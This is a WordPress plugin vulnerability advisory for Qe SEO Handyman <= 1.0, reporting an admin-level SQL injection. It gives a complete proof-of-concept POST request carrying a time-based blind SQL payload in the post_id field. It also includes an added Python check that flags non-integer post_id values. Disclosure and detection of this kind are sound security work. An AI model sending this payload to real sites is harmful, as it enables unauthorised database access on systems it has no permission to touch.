WordPress Plugin Vulnerabilities
Qe SEO Handyman <= 1.0 - Admin+ SQLi
Description
The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=all-pages-meta
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 122
Origin: http://localhost
Connection: close
Cookie: [admin+]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=save_all_page_meta&parms=description&meta_description=test2&post_id=2+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)
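A defensive check for the request above, as an added example that is not part of the original advisory or the plugin's code: it parses an admin-ajax.php form body and flags a save_all_page_meta request whose post_id, the field carrying the payload in the proof of concept, is not a single plain integer. The function name, the return labels and every sample body other than the PoC one are assumptions made for this example.

```python
from urllib.parse import parse_qs

# Action and field names are taken from the proof-of-concept request above.
TARGET_ACTION = "save_all_page_meta"
ID_FIELD = "post_id"


def check_body(body: str) -> str:
    """Classify a form-encoded admin-ajax.php POST body (hypothetical helper).

    Returns "ignore" (other action), "ok" (post_id is one plain integer)
    or "suspicious" (post_id missing, repeated, or not purely digits).
    """
    # parse_qs decodes '+' and %XX escapes, as the server does before the
    # value reaches the SQL statement.
    fields = parse_qs(body, keep_blank_values=True)
    if fields.get("action", [""])[-1] != TARGET_ACTION:
        return "ignore"
    values = fields.get(ID_FIELD, [])
    # Require exactly one value so a repeated parameter cannot hide a payload.
    if len(values) != 1:
        return "suspicious"
    value = values[0]
    # ASCII digits only, bounded length: anything else is not a post ID.
    if value.isascii() and value.isdigit() and len(value) <= 20:
        return "ok"
    return "suspicious"


# Sample bodies: "poc" is the body from this page, the rest are constructed.
SAMPLES = {
    "poc": "action=save_all_page_meta&parms=description&meta_description=test2"
           "&post_id=2+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)",
    "benign": "action=save_all_page_meta&parms=description"
              "&meta_description=test2&post_id=2",
    "encoded": "action=save_all_page_meta&post_id=2%20AND%201%3D1",
    "repeated": "action=save_all_page_meta&post_id=2&post_id=3",
    "other": "action=heartbeat&post_id=abc",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:9s} {check_body(body)}")
```

The same rule, accepting only an integer for post_id, is what the server-side handler needs before the value is placed in a query.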
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Krohmer, Kunal Sharma
Submitter
Daniel Krohmer
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-08
Added
2022-12-08
Last Updated
2022-12-08